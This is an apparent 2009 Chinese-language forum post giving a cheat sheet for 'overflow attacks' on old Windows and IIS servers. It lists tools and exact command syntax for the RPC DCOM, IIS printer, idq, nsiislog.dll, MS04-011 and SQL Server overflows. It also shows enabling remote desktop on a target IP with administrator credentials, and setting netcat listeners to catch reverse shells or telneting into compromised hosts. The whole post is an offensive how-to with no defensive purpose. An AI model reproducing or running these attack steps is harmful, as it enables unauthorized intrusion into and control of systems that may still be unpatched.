fuchou-angle 发表于 2009-7-8 08:17:58

溢出攻击的使用

溢出攻击的使用

开3389用的方法:
            cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

            例子:cscript rots.vbs 218.16.50.147 "administrator" "mm" 3389 /r
            溢出专题:

            ---->>>>rpc拒绝服务:
            工具:
            1.perl解释器
            2.漏洞工具com.pl
            3漏洞特征:端口开放为135
            4.使用方法:
            dcom.pl IP

            ---->>>>>printer漏洞:
            工具:
            1.X-scan
            2.iis5hack
            3.扫出后,用iis5hack溢出
            4.方法:iis5hack IP Port sp类型(0或1)
            溢出后用telnet IP 99

            ---->>>>>>RPC135溢出
            工具:
            1.rpcdcom.exe
            2.webdavscan扫出系统版本
            3.superscan扫135端口速度快的工具
            4.rpcdcom.exe 版本 IP

            ----->>>>>idq漏洞溢出
            工具:
            1.snake IIS 溢出工具(IISMiscOverflowV2_Build0016)
            2.X-Scan 扫出有null.idq漏洞的就行
            3.用snake IIS 溢出后,直接telnet上去就行了

            ------>>>>>nsiislog.dll远程缓冲区溢出漏洞
            工具:
            1.media.exe和nc.exe
            2.方法:输入:http:/IP/scripts/nsiislog.dll
            有漏洞的一看就知
            溢出格式:media.exe IP -p 80 -r /scripts/nsiislog.dll
            溢出后打开nc -vv IP 34816
            好了,接下来提升权限的我就不说了!

            ------>>>>>ms04011溢出
            1.先用工具包里的扫描器有漏洞的机子
            2.getos ip 得到版本windowsNT是4.0 2K的是5.0 XP的是5.1 2003的是6.0
            3.打开nc -vv -l -p 1234
            4.ms04011 版本号(0或1) 要进攻的IP 听的端口 自己的IP.

            ------>>>>>sql2.exe溢出
            工具:
            1.nc.exe和sql2.exe
            2.打开nc -l -p 40
            3.sql2.exe IP 40 0或1
页: [1]
查看完整版本: 溢出攻击的使用